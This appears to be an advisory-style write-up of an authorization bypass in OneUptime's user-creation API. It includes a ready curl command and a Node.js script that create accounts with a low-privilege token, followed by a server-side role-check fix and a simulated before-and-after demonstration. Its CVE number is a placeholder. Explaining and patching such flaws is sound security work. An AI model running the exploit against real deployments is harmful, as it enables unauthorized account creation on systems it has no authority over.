OneUptime, Authorization Bypass, CVE-2025-XXXX (High)


How the mentioned CVE works:

The vulnerability is in the API endpoint responsible for user creation, given here as /api/user. Under normal conditions only a high-privilege administrator should be able to create accounts, and the application's official user interface exposes the action only to administrators. The server, however, does not enforce that restriction itself: the authorization check on the endpoint is missing or insufficient, and the UI is not a security boundary, because any authenticated client can skip it and call the API directly. A low-privilege, authenticated user can therefore send a direct, crafted POST request to the endpoint carrying the JSON payload for a new account (e.g. {"email": "[email protected]", "password": "password"}). Because the server never verifies that the requester holds the 'Admin' role, it processes the request and creates the account, allowing unauthorized account proliferation.
Platform: OneUptime
Version: Pre 4.0.0
Vulnerability: Authorization Bypass
Severity: High
Date: 2024-11-26

Prediction: Patch by 2024-12-10

What Undercode Says:

curl -X POST https://TARGET/api/user \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer LOW_PRIVILEGE_JWT_TOKEN" \
  -d '{"email":"[email protected]", "password":"mypassword"}'

// Simple Node.js script to exploit the flaw (requires: npm install axios)
// LOW_PRIVILEGE_JWT_TOKEN must hold a valid token for any non-admin account
const axios = require('axios');

const lowPermToken = process.env.LOW_PRIVILEGE_JWT_TOKEN;

async function createUser() {
  const response = await axios.post('https://TARGET/api/user', {
    email: '[email protected]',
    password: 'pass123'
  }, {
    headers: { 'Authorization': `Bearer ${lowPermToken}` }
  });
  // A 2xx response here means the server created the account without an admin check
  console.log(response.status, response.data);
}

createUser().catch(err => console.error(err.response ? err.response.status : err.message));

How to Exploit:

Send a crafted POST request to the user-creation API using a low-privilege authenticated session; no administrative rights are needed. The exploit requires only a valid low-privilege JWT and knowledge of the endpoint path.

Protection from this CVE

Enforce role-based access control (RBAC) on the endpoint server-side: run an authorization middleware before the handler that rejects any request whose verified identity does not hold an administrative role, and apply it to the API route itself rather than relying on the UI to hide the action. The role used in that decision must come from the server-validated session or token, never from the request body.
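The following is an added example, not OneUptime's code, illustrating both the flaw described above and the fix: a user-creation handler shown first with no authorization middleware (any authenticated caller reaches it) and then behind an Express-style RBAC middleware that rejects non-admins before the handler runs. Everything here is hypothetical: an upstream authentication middleware is assumed to have already verified the JWT signature and placed its claims on req.user, the admin role is assumed to be named 'Admin' as on this page, and runChain() stands in for the framework's router so the code runs offline.

```javascript
// Added example (not OneUptime's code): server-side RBAC for a user-creation
// endpoint, vulnerable wiring next to hardened wiring. Assumptions (hypothetical):
// req.user holds claims from a JWT whose signature was already verified upstream;
// the admin role is named 'Admin'; runChain() replaces the real router.

const ADMIN_ROLE = 'Admin';

// Middleware factory. The handler is only reached if next() is called, so an
// unauthenticated or under-privileged caller is stopped at the route itself.
function requireRole(role) {
  return function (req, res, next) {
    if (!req.user) {
      res.status(401).json({ error: 'authentication required' });
      return;
    }
    if (req.user.role !== role) {
      res.status(403).json({ error: 'insufficient privileges' });
      return;
    }
    next();
  };
}

// The user-creation handler. The new account's role is fixed server-side, so a
// "role" field in the request body cannot grant the new account Admin.
function makeCreateUserHandler(store) {
  return function (req, res) {
    const { email, password } = req.body || {};
    if (typeof email !== 'string' || typeof password !== 'string') {
      res.status(400).json({ error: 'email and password required' });
      return;
    }
    store.push({ email, role: 'Member' }); // password hashing omitted for brevity
    res.status(201).json({ email });
  };
}

// Minimal stand-ins for the framework's response object and router.
function makeResponse() {
  return {
    statusCode: 200,
    body: undefined,
    status(code) { this.statusCode = code; return this; },
    json(obj) { this.body = obj; return this; },
  };
}

function runChain(middlewares, handler, req) {
  const res = makeResponse();
  let i = 0;
  const next = () => {
    if (i < middlewares.length) middlewares[i++](req, res, next);
    else handler(req, res);
  };
  next();
  return res;
}

// Vulnerable wiring: no authorization middleware on the route, so any
// authenticated caller who knows the path creates a user.
function vulnerableCreateUser(req, store) {
  return runChain([], makeCreateUserHandler(store), req);
}

// Hardened wiring: requireRole(ADMIN_ROLE) runs first, on the API route itself.
function hardenedCreateUser(req, store) {
  return runChain([requireRole(ADMIN_ROLE)], makeCreateUserHandler(store), req);
}

// Constructed sample requests standing in for two verified callers. The
// low-privilege body also tries to smuggle a role, which the handler ignores.
const LOW_PRIV_REQUEST = {
  user: { id: 'user-2', role: 'Member' },
  body: { email: 'new-user@example.test', password: 'pass123', role: 'Admin' },
};
const ADMIN_REQUEST = {
  user: { id: 'user-1', role: 'Admin' },
  body: { email: 'new-user@example.test', password: 'pass123' },
};

// Returns the status codes a low-privilege caller gets from each wiring, plus
// the admin's result on the hardened route: 201 / 403 / 201.
function demo() {
  return {
    vulnerable: vulnerableCreateUser(LOW_PRIV_REQUEST, []).statusCode,
    hardened: hardenedCreateUser(LOW_PRIV_REQUEST, []).statusCode,
    admin: hardenedCreateUser(ADMIN_REQUEST, []).statusCode,
  };
}

console.log(JSON.stringify(demo()));
```

The check belongs on the route, not in the UI, because the UI is skipped entirely by a direct request such as the curl command above; and the decision reads only the server-verified req.user, so a caller cannot promote themselves by adding a role to the JSON body.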

Impact:

Unauthorized account creation by any low-privilege user, enabling system abuse, resource exhaustion, and a user database that can no longer be trusted.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
